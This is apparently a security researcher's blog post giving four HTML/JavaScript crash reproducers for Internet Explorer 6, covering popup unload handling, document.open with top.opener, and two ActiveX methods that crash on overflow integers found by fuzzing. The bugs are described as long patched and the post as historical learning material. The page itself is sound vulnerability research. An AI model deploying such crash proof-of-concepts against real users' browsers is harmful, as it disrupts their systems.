Multiple Crashes

A collection of four separate crash cases, found around the same time. Each one is a standalone reproducer.

AbortUnloadFromCreatePopUp (IE6 only)

An access violation in ShowHTMLDialog occurs when navigating away from a page that creates a popup during the unload event and sets parent.location.href from within that popup’s onunload:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Cover Desktop</title></head>
<body>
<font face="Tahoma" size="2">
<b> IE6 </b>
Crash: Access Violation in the ShowHTMLDialog (mshtml) function after you <a href="http://www.google.com/">move away</a> from this URL.
</font>

<script language="JavaScript">
function startPopUp(){
	var oPopup = window.createPopup();
	oPopup.document.body.innerHTML = '.<script defer="defer">window.onunload=function (){parent.location.href=""}<\/script>';
	oPopup.show(0, 0, 1000, 1000);
}
onbeforeunload = onunload = startPopUp;
</script>

</body>
</html>

DocumentOpen_AccessOpener

Calling document.open() to get a new document object, storing it in top.opener, and then accessing top.opener from a newly written script crashes the browser:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when accessing the opened document</title></head>
<body>
<script language="JavaScript">

top.opener=document.open("text/html", "replace");

//When accessing the top.opener, it crashes.
document.write('<script>a=top.opener;<\/script>');
document.close();

</script>
</body>
</html>

FolderItem_InvokeVerbEx (IE6 only)

Found with the axMan fuzzer — calling InvokeVerbEx on the FolderItem ActiveX with out-of-range integer values crashes IE6:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when calling the InvokeVerbEx in the FolderItem</title></head>
<body>
I didn't found this bug: I simply loaded the axMan Fuzzer and that script found it.

<object id="folderItem" classid="clsid:FEF10FA2-355E-4e06-9381-9B24D7F7CC88"></object>

<script language="JavaScript">

folderItem.InvokeVerbEx(4294967296, 4294967296);

</script>

</body>
</html>

FolderItems3_Filter (IE6 only)

Similarly found with axMan — calling Filter on the FolderItems3 ActiveX with large integer values crashes IE6:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Crash when calling the InvokeVerbEx in the FolderItem</title></head>
<body>
I didn't found this bug: I simply loaded the axMan Fuzzer and that script found it.

<object id="folderItem3" classid="clsid:53C74826-AB99-4d33-ACA4-3117F51D3788"></object>

<script language="JavaScript">
folderItem3.Filter(2147483647, 4294967296);
</script>

</body>
</html>

The last two were discovered through automated fuzzing rather than manual exploration. Passing 4294967296 (2^32) to methods that expect 32-bit integers causes integer overflow or type confusion in the parameter handling code.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [UXSS Using Just htmlFile] :: [UXSS - Pseudo Cross-Domain Scriptlet Component] >